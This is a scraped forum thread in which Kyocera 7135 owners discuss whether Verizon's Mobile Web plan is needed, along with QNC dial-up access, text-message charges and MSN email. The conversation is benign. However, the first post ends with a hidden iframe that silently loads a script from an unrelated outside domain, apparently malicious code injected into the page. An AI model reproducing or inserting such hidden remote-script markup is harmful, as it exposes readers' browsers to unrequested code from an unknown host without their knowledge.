+ Reply to Thread

Thread: mobile web?

kiq

mobile web?

Ok.. I think the verizon customer rep I spoke to was confused about the 7135 and mobile web.

The 7135 _does not_ need their mobile web service in order to surf the web, correct? If not, then there is no point for us 7135 users to subscribe to this service, right?

Thanks for any help!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You're right, you don't need Mobile Web to get on the internet with the 7135. I have a regular America's Choice plan at $35 a month and I can get on the net using QNC. It's slow (14,4) but good enough for what I want. I can even use it as a modem for my laptop. QNC uses up your minutes as does Mobile Web.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Hmmm. Is that really true? When I got my Kyocera 7135 I added the $6.95 a month Mobile Web plan because the Verizon rep told me I had to subscribe to Mobile Web if I wanted to go on the web with my phone OR to send and receive email on my phone. He said a Mobile Web plan was not needed to just send and receive text messages.

Can I truly send and receive email and browse the web without subscribing to any Mobile Web plan? I'd love to save myself $6.95 a month. Every penny counts after buying this phone!

Yes, it's true. See this FAQ for more info about browsing without Mobile Web, etc. http://www.smartphonesource.com/vbul...&threadid=6431 Lots of salespeople, who don't understand what the Palm platform can do, have told lots of smartphone owners this same mistaken information.

For text messages, you can either buy those in a package, or pay for them "a la carte" if you only use a few. (They're 2 cents to receive, and 10 cents to send.)

Check out this on the Verizon web site:

http://www.verizonwireless.com/inter...about_mo_svc_1

turboCat,
    What do you do about text messages you get that you don't want? Someone was sending me messages and I didn't know who they were. I'll have to check my bill to see if I was charged for them. I don't use text messenging myself.

Thanks. I called Verizon this morning and had my Mobile Office plan removed. I find it painful going online with this phone to browse the web anyway, and hardly ever do. Finding a good way to send and receive email would be nice though. I'm having a problem doing this because my email is with MSN, but it's the old MSN POP3 email, which I prefer to keep so I can download to Outlook and save emails to various Outlook folders if I want to, and also sync with the Kyocera. Unfortunately, MSN uses its own proprietary secure password authentication protocol for its POP3 accounts, so I can't set it up on my Kycoera 7135.

Originally posted by tmwebsites
    Check out this on the Verizon web site:

http://www.verizonwireless.com/inter...about_mo_svc_1

turboCat,
    What do you do about text messages you get that you don't want? Someone was sending me messages and I didn't know who they were. I'll have to check my bill to see if I was charged for them. I don't use text messenging myself.
    Go to www.vtext.com, register, then you can block text messaging senders. I got spam about 3 times on my 6035, and it drove me up the wall, those idiot spammers :BigKnife: . How dare they waste my hard earned pennies!

Is this also true for Alltel?

Originally posted by tmwebsites
    You're right, you don't need Mobile Web to get on the internet with the 7135. I have a regular America's Choice plan at $35 a month and I can get on the net using QNC. It's slow (14,4) but good enough for what I want. I can even use it as a modem for my laptop. QNC uses up your minutes as does Mobile Web.
    What's QNC? Do I have to pay for that? Is there a website for that?

QNC is the regular internet access through Verizon. It's limited to 14.4 kbps connection speed. It's included in regular Verizon plans as well as their Express Network ones (so you can get a connection if EN isn't available). It works in digital areas.

Here is a good FAQ on setting it up. http://www.smartphonesource.com/vbul...&threadid=5385

I don't know about what ALLTEL provides for web access.